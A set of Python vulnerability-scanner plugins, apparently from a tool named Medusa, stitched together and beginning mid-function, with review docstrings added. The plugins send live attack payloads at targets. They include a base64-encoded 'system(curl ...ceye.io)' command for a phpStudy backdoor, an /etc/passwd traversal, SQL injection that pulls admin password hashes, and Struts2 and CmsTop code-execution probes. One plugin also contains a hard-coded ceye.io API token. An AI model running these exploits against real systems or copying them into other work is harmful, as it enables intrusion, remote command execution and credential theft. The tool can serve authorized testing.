                web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
    except:
        # Bare except: any failure aborts the remaining paths; only a warning is emitted.
        logging.warning(Url)
        _ = VulnerabilityInfo('')
        logging.warning(_.info.get('parameter'))
    _t = VulnerabilityInfo(Medusas)
    return (_t.info)
def medusa(Url, RandomAgent, ProxyIp):
    """GET `/.git/config` on every port in the module-level `list` and collect bodies containing 'repositoryformatversion'.

    `list` (a module-level sequence of port strings that shadows the builtin) and `ReturnList` are
    module state: an explicit port in Url is appended to `list` and hits are appended to `ReturnList`,
    so both accumulate across calls and earlier targets' results are included in later return values.
    Default ports (80/443) are not added to `list`. Hits are rated High; the function returns
    VulnerabilityInfo(ReturnList).info.
    NOTE(review): indentation was reconstructed from a collapsed source — confirm against the original file.
    """
    scheme, url, port = UrlProcessing(Url)
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        if str(port) not in list:
            list.append(str(port)) # add the user-supplied port to the list so it is scanned below
    global resp
    headers = {
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'User-Agent': RandomAgent,
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    for payload in list:
        PayloadUrl = url + ':' + payload + '/.git/config'
        try:
            s = requests.session()
            if ProxyIp != None:
                proxies = {
                    # the proxy value must be prefixed with http:// or https://
                    "http": "http://" + str(ProxyIp)
                }
                resp = s.get(PayloadUrl, headers=headers, proxies=proxies, timeout=5, verify=False)
            elif ProxyIp == None:
                resp = s.get(PayloadUrl, headers=headers, timeout=5, verify=False)
            con = resp.text
            code = resp.status_code
            if code == 200 and con.lower().find( 'repositoryformatversion') != -1:
                Medusa = "{} \r\n漏洞详情:{}\r\n".format(url, PayloadUrl)
                ReturnList.append(Medusa)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
        except:
            # Bare except: warn and continue with the next port.
            logging.warning(Url)
            _ = VulnerabilityInfo('')
            logging.warning(_.info.get('parameter'))
    _t = VulnerabilityInfo(ReturnList)
    return (_t.info)
def medusa(Url,RandomAgent,ProxyIp):
    """Out-of-band probe: send a base64 command in the accept-charset header, wait 5 s, then poll a ceye.io DNS log.

    `payload` is defined in the plugin module. A random number correlates the DNS record with this
    run; a match is rated High and returned as _t.info. Inner failures log a warning; the outer
    `except Exception as e: pass` silently discards everything else, including request errors.
    NOTE(review): the ceye.io API token and the per-account subdomain are hard-coded in source and the
    token is sent over plain http:// — a credential committed to the repository should be moved to
    configuration/environment and rotated. `global resp`/`global resp2` are module state; resp2 is
    never assigned here.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    global resp
    global resp2
    Random = str(random.randint(666, 666666))  # correlation id for the DNS record, not a security token
    commandS = ('''system("curl http://{}_phpStudy_backdoor_{}.7ktb2x.ceye.io");''').format(url, Random)
    cmd = base64.b64encode(commandS.encode('utf-8'))
    try:
        payload_url = scheme+"://"+url+payload
        headers = {
            'Sec-Fetch-Mode': 'navigate',
            'Sec-Fetch-User': '******',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site': 'none',
            'accept-charset': cmd,
            'Accept-Encoding': 'gzip,deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'User-Agent': RandomAgent
        }
        s = requests.session()
        if ProxyIp!=None:
            proxies = {
                # the proxy value must be prefixed with http:// or https://
                "http": "http://" + str(ProxyIp)
            }
            resp = s.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
        elif ProxyIp==None:
            resp = s.get(payload_url,headers=headers, timeout=5, verify=False)
        time.sleep(5)  # give the out-of-band DNS lookup time to be recorded
        ceyeurl = 'http://api.ceye.io/v1/records?token=f84734983a259c598a1edeb772981d14&type=dns&filter='
        try:
            ceye_content = requests.get(ceyeurl, timeout=5).content
            if "{}_phpStudy_backdoor_{}".format(url, Random) in ceye_content:
                Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\nHeader\r\n{}".format(url, payload_url,headers)
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
                return (_t.info)
        except:
            logging.warning(Url)
            _ = VulnerabilityInfo('')
            logging.warning(_.info.get('parameter'))
    except Exception as e:
        pass  # NOTE(review): silent swallow — request and parsing errors leave no trace
def OpenProxy():
    """Return the first usable proxy from /ScanResult/ProxyPool.txt, crawling a new pool when the file is missing.

    The pool file is deleted when it is older than three days (same year and month) or from a
    different month/year. Each remaining line is tested with a 2 s GET through the proxy; the first
    one answering 200 is returned. Two identical consecutive lines are taken as "nothing works" and
    None is returned.
    NOTE(review): `RepeatCleaningAgent` is reset to 1 at the top of every call, so the `== 1` guard in
    the outer except can never stop the recursion if the crawler keeps failing to produce the file.
    Deleting the file closes `f`, so the `for ProxyPool in f` loop then raises on a closed handle
    and lands in that same except path. The recursive `OpenProxy()` result is discarded, so a proxy
    found on the retry is not returned to the caller. On POSIX os.path.getctime is the inode change
    time, not the creation time. The pool path is an absolute path at the filesystem root.
    Indentation was reconstructed from a collapsed source — confirm against the original file.
    """
    global RepeatCleaningAgent
    RepeatCleaningAgent = 1 # marks whether the IPs were just crawled and cleaned
    ProxyIpComparison = ""
    try: # try to open the file to see whether a proxy pool exists
        with open("/ScanResult/ProxyPool.txt", encoding='utf-8') as f:
            try:
                FileCreationYime = time.localtime( os.path.getctime("/ScanResult/ProxyPool.txt")) # file timestamp
                CurrentTime = time.localtime(time.time()) # current time
                if FileCreationYime.tm_year == CurrentTime.tm_year: # same year?
                    if CurrentTime.tm_mon == FileCreationYime.tm_mon: # same month?
                        a = FileCreationYime.tm_mday
                        b = CurrentTime.tm_mday
                        c = abs(a - b) # day difference
                        if c >= 3: # older than 3 days: delete the pool
                            f.close() # close the open handle before deleting the file
                            os.remove("/ScanResult/ProxyPool.txt")
                    else:
                        f.close()
                        os.remove("/ScanResult/ProxyPool.txt")
                else:
                    f.close()
                    os.remove("/ScanResult/ProxyPool.txt")
            except:
                pass
            for ProxyPool in f: # test each proxy IP for usability
                ProxyIps = ProxyPool[:-1] # strip the trailing \n
                if ProxyIps == ProxyIpComparison: # same as the previous IP: the crawled IPs are all unusable, stop using a proxy
                    return
                ProxyIpComparison = ProxyPool[:-1]
                proxies = {
                    # the proxy value must be prefixed with http:// or https://
                    "http": "http://" + str(ProxyIps)
                }
                try:
                    if requests.get('https://www.baidu.com/', proxies=proxies, timeout=2).status_code == 200:
                        return ProxyIps # second-stage cleaning passed: this proxy IP is usable
                except:
                    pass
    except:
        if RepeatCleaningAgent == 1:
            HttpProxy = ClassCongregation.Proxy()
            HttpProxy.HttpIpProxy() # file missing: invoke the crawler class
            OpenProxy() # then call itself again
        else:
            pass
    RepeatCleaningAgent = 0 # global flag intended to prevent repeated crawling
def medusa(Url, RandomAgent, ProxyIp):
    """CRLF-injection probe: GET the module-level Payload path without following redirects and inspect a Set-Cookie header.

    `Payload` is defined in the plugin module. A 302 whose header lookup `resp.headers['\\rSet-Cookie']`
    contains 'a=1' is rated High and returned as _t.info; otherwise the function returns None. A
    missing header raises KeyError, which the bare except turns into a logged warning.
    ProxyIp is only applied to the "http" scheme; TLS verification is left at the requests default.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    PayloadUrl = scheme + "://" + url + ':' + str(port) + Payload
    host = url + ':' + str(port)
    headers = {
        'Host': host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
    }
    s = requests.session()
    try:
        if ProxyIp != None:
            proxies = {
                # the proxy value must be prefixed with http:// or https://
                "http": "http://" + str(ProxyIp)
            }
            resp = s.get(PayloadUrl, headers=headers, proxies=proxies, timeout=5, allow_redirects=False)
        elif ProxyIp == None:
            resp = s.get(PayloadUrl, headers=headers, timeout=5, allow_redirects=False)
        con = resp.headers['\rSet-Cookie']
        code = resp.status_code
        if code == 302 and con.lower().find('a=1') != -1:
            Medusa = "{} \r\n漏洞详情:\r\nPayload:{}\r\n".format(url, PayloadUrl)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            return (_t.info)
    except:
        # Bare except: request errors and a missing header both end here as a warning.
        logging.warning(Url)
        _ = VulnerabilityInfo('')
        logging.warning(_.info.get('parameter'))
def medusa(Url, RandomAgent, UnixTimestamp):
    """File-read probe: GET /robots with a traversal string in the Accept header and look for passwd-style markers.

    All four markers ('root:', 'bin:', 'sys:', 'sync:') must appear in a 200 body. The body is
    included in the report as its UTF-8 bytes (con.encode), so the message shows a bytes repr.
    A hit is written via VulnerabilityDetails and WriteFile; exceptions go to Outlier and the error log.
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload = "../../../../../../../../etc/passwd{{"
        payload_url = scheme + "://" + url + ":" + str(port) + "/robots"
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': payload,
            'Accept-Language': 'en',
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=5, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('root:') != -1 and con.find( 'bin:') != -1 and con.find('sys:') != -1 and con.find( 'sync:') != -1:
            Medusa = "{} 存在任意文件读取漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:\r\n{}".format( url, payload_url, con.encode(encoding='utf-8'))
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception as e:
        # Report the exception through the shared handler, then log it under the plugin's group name.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer
def medusa(Url, RandomAgent, ProxyIp):
    """GET /5clib/Inuseraction.action?actionkind=reg and treat two registration-form markers in a 200 body as a positive.

    ProxyIp is accepted but not applied. A hit is rated High and written via WriteFile; exceptions are
    logged under the plugin name. TLS verification is disabled (verify=False).
    """
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload = "/5clib/Inuseraction.action?actionkind=reg"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200 and con.find('isIdCards()') != -1 and con.find( 'addressprompt') != -1:
            Medusa = "{}存在五车图书管理系统存在越权添加管理员漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception:
        # Record the failure in the error log under this plugin's group name ('algroup').
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def medusa(Url, RandomAgent, proxies=None, **kwargs):
    """GET the module-level `payload` path and match a 200 body against the 'No error in <b>…</b>' regex.

    `payload` is defined in the plugin module; proxies is normalised through ClassCongregation.Proxies.
    The regex match object `m` is only used as a boolean. A hit is written via VulnerabilityDetails
    (with kwargs) and WriteFile; exceptions go to Outlier and the error log.
    """
    proxies = ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload_url = scheme + "://" + url + ':' + str(port) + payload
        headers = {
            'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'User-Agent': RandomAgent,
        }
        resp = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
        con = resp.text
        code = resp.status_code
        if code == 200:
            m = re.search(r'No error in <b>([^<]+)</b>', con)
            if m:
                Medusa = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url)
                _t = VulnerabilityInfo(Medusa)
                ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # pass the url and the scan result
                ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception as e:
        # Report the exception through the shared handler, then log it under the plugin's group name.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer
def medusa(Url, RandomAgent, ProxyIp):
    """POST a login form to /index.php/open/bang and look for the MySQL duplicate-key error text in the body.

    Uses ClassCongregation.UrlProcessing().result. ProxyIp is accepted but not applied; the status code
    is not checked. A hit is rated High and written via WriteFile; exceptions are logged under the
    plugin name.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    try:
        payload = "/index.php/open/bang"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
        }
        data = "openid=x&denglu=login&username=a%27 and(select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1#&userpass=testvul"
        s = requests.session()
        resp = s.post(payload_url, headers=headers, data=data, timeout=6, verify=False)
        con = resp.text
        if con.find("for key 'group_key'") != -1:
            Medusa = "{}存在CSDJCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High() # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result( str(url), str(Medusa)) # write to file; url is the target file name, Medusa the result
    except Exception:
        # Record the failure in the error log under this plugin's group name ('algroup').
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _) # call the log writer with the URL and the plugin name
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """POST the module-level `payload` to /user.action and look for id-style output ('uid', 'gid', 'groups').

    `payload` is defined in the plugin module; proxies is normalised through ClassCongregation.Proxies.
    A hit is written via VulnerabilityDetails (with kwargs) and WriteFile; exceptions go to Outlier and
    the error log with the plugin name and target.
    NOTE(review): 'Content-Length' is hard-coded to '571' while requests normally derives it from the
    body; confirm the value matches len(payload) or drop the header.
    """
    proxies=ClassCongregation.Proxies().result(proxies)
    scheme, url, port = UrlProcessing(Url)
    # Fill in the scheme's default port when the URL does not carry an explicit one.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # explicit port kept as given (no-op)
    payload_url = scheme+"://"+url+':'+str(port)+'/user.action'
    host=url+':'+str(port)
    headers = {
        'Host':host,
        'Accept-Encoding': 'gzip, deflate',
        'Accept': '*/*',
        'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
        'User-Agent': RandomAgent,
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded',
        'Content-Length': '571',
        'DNT': '1',
        'Referer':payload_url,
        'Upgrade-Insecure-Requests': '1'
    }
    try:
        resp = requests.post(payload_url, data=payload,headers=headers, proxies=proxies,timeout=5, verify=False)
        con = resp.text
        code = resp.status_code
        if code==200 and con.lower().find('uid')!=-1 and con.lower().find('gid')!=-1 and con.lower().find('groups')!=-1:
            Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n影响版本:2_0_0-2_2_3\r\nPayload:{}\r\nPost:{}\r\n".format(url, payload_url,payload)
            _t = VulnerabilityInfo(Medusa)
            ClassCongregation.VulnerabilityDetails(_t.info, url,**kwargs).Write() # pass the url and the scan result
            ClassCongregation.WriteFile().result(str(url),str(Medusa))# write to file; url is the target file name, Medusa the result
    except Exception as e:
        # Report the exception through the shared handler, then log it with the plugin name and target.
        _ = VulnerabilityInfo('').info.get('algroup')
        ClassCongregation.ErrorHandling().Outlier(e, _)
        _l = ClassCongregation.ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# call the log writer
def medusa(Url,RandomAgent,ProxyIp) -> None:
    """Check one target for the B2Bbuilder SQL injection in comment.php and record any hit.

    Args:
        Url: target as handed over by the scanner; split by UrlProcessing().
        RandomAgent: value sent as the User-Agent header.
        ProxyIp: accepted for the plugin interface but not read in this body.

    Returns:
        None. A hit is reported through VulnerabilityDetails and WriteFile;
        any failure is swallowed and written to ErrorLog.
    """
    scheme, url, port = UrlProcessing(Url)
    # Default the port only when none was given with the URL.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        # Error-based probe in the `conid` query parameter. NOTE(review): a
        # commented-out variant of this payload was removed from here; dead code
        # belongs in version control history, not in comments.
        payload = "/comment.php?ctype=2&conid=16873%20and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(md5(c),0x3A,password)%20from%20b2bbuilder_admin%20Order%20by%20user%20limit%200,1)%20)%20from%20`information_schema`.tables%20limit%200,1),floor(rand(0)*2))x%20from%20`information_schema`.tables%20group%20by%20x)a)%20and%201=1"
        payload_url = scheme + "://" + url +":"+ str(port)+ payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
        }
        # NOTE(review): verify=False disables TLS certificate checking; the
        # session is never closed explicitly.
        s = requests.session()
        resp = s.get(payload_url,headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # Signature: a 200 whose body echoes the md5 marker the probe asks the
        # database to compute — presumably md5 of the literal in the payload;
        # confirm the constant matches before changing it.
        if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
            Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(url,payload_url,con)
            _t=VulnerabilityInfo(Medusa)
            web=ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity setters: serious = critical, High = high, Intermediate = medium, Low = low
            ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file; url is the per-target file name, Medusa the result
    except Exception:
        # Any failure is only logged under the plugin's 'algroup' name.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log target URL and failing plugin name
def medusa(Url, RandomAgent, ProxyIp):
    """Check one target for SQL injection via the X-Forwarded-For header on /index.php.

    Args:
        Url: target as handed over by the scanner; split by UrlProcessing().
        RandomAgent: value sent as the User-Agent header.
        ProxyIp: accepted for the plugin interface but not read in this body.

    Returns:
        str(_t.info) on a hit; None (implicitly) when nothing matched or an
        exception was caught. Unlike the sibling plugins this one does not call
        WriteFile, so the caller is responsible for persisting the returned text.

    NOTE(review): the report text names B2Bbuilder although the probe targets
    /index.php via a header — possibly copied from another plugin; confirm.
    """
    scheme, url, port = UrlProcessing(Url)
    # Default the port only when none was given with the URL.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    try:
        payload = "/index.php"
        payload_url = scheme + "://" + url + ":" + str(port) + payload
        headers = {
            'User-Agent': RandomAgent,
            'Content-Type': 'application/x-www-form-urlencoded',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            # Error-based probe carried in a client-IP header that a vulnerable
            # application stores unescaped.
            "X-Forwarded-For": "1.1.1.1',(select 1 from (select count(*),concat((Select concat(md5(3.14))),floor(rand(0)*2))x from information_schema.tables group by x)a),1,1)#"
        }
        # NOTE(review): verify=False disables TLS certificate checking; the
        # session is never closed explicitly.
        s = requests.session()
        resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
        con = resp.text
        code = resp.status_code
        # Signature: a 200 whose body contains a 33-character marker — presumably
        # the md5 from the header followed by the digit the concat appends; the
        # constant is one character longer than a bare md5, confirm it is intended.
        if code == 200 and con.find("4beed3b9c4a886067de0e3a094246f781") != -1:
            Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(url, payload_url, resp.text)
            _t = VulnerabilityInfo(Medusa)
            web = ClassCongregation.VulnerabilityDetails(_t.info)
            web.High()  # severity setters: serious = critical, High = high, Intermediate = medium, Low = low
            return (str(_t.info))
    except Exception:
        # Any failure is only logged under the plugin's 'algroup' name.
        _ = VulnerabilityInfo('').info.get('algroup')
        _l = ClassCongregation.ErrorLog().Write(url, _)  # log target URL and failing plugin name
def medusa(Url,RandomAgent,ProxyIp) -> None:
    """Check one target for the CmsTop remote code execution issue on two candidate URLs.

    Args:
        Url: target as handed over by the scanner; split by
            ClassCongregation.UrlProcessing().result().
        RandomAgent: value sent as the User-Agent header.
        ProxyIp: accepted for the plugin interface but not read in this body.

    Returns:
        None. Each hit is reported through VulnerabilityDetails and WriteFile;
        a failure on one candidate URL is logged and the loop moves on.
    """
    scheme, url, port = ClassCongregation.UrlProcessing().result(Url)
    # Default the port only when none was given with the URL.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    # `$page` and `${@phpinfo()}` are literal text here (plain Python string).
    payload = "/app/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    payloadurl = scheme + "://" + url + ":" + str(port) + payload
    payload2 = "/?app=search&controller=index&id=$page&action=search&wd=a&test=${@phpinfo()}"
    # Second candidate: the same path on an "app" host derived from the target's
    # parent domain (everything after the first label).
    domain_name = ".".join(url.split(".")[1:])
    # NOTE(review): "app" + domain_name has no dot between them, so for
    # "www.example.com" this builds "appexample.com" rather than
    # "app.example.com" — looks like a bug; confirm the intended host.
    payloadurl2 = scheme + "://app" + domain_name + ":" + str(port) + payload2
    Payloads = [payloadurl,payloadurl2]
    Medusas = []  # intended to collect results, but never appended to in this body
    for payload_url in Payloads:
        try:
            headers = {
                'User-Agent': RandomAgent,
                'Content-Type': 'application/x-www-form-urlencoded',
                'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
            }
            # NOTE(review): verify=False disables TLS certificate checking; a new
            # session is opened per candidate URL and never closed explicitly.
            s = requests.session()
            resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
            con = resp.text
            code = resp.status_code
            # Signature: a 200 containing both phpinfo() page markers.
            if code== 200 and con.find('PHP Version') != -1 and con.find('Configure Command') != -1 :
                Medusa = "{}存在CmsTop远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con)
                _t=VulnerabilityInfo(Medusa)
                web=ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # severity setters: serious = critical, High = high, Intermediate = medium, Low = low
                ClassCongregation.WriteFile().result(str(url),str(Medusa))  # write to file; url is the per-target file name, Medusa the result
        except Exception:
            # A failure on this candidate is logged under the plugin's 'algroup'
            # name; the remaining candidates are still tried.
            _ = VulnerabilityInfo('').info.get('algroup')
            _l = ClassCongregation.ErrorLog().Write(url, _)  # log target URL and failing plugin name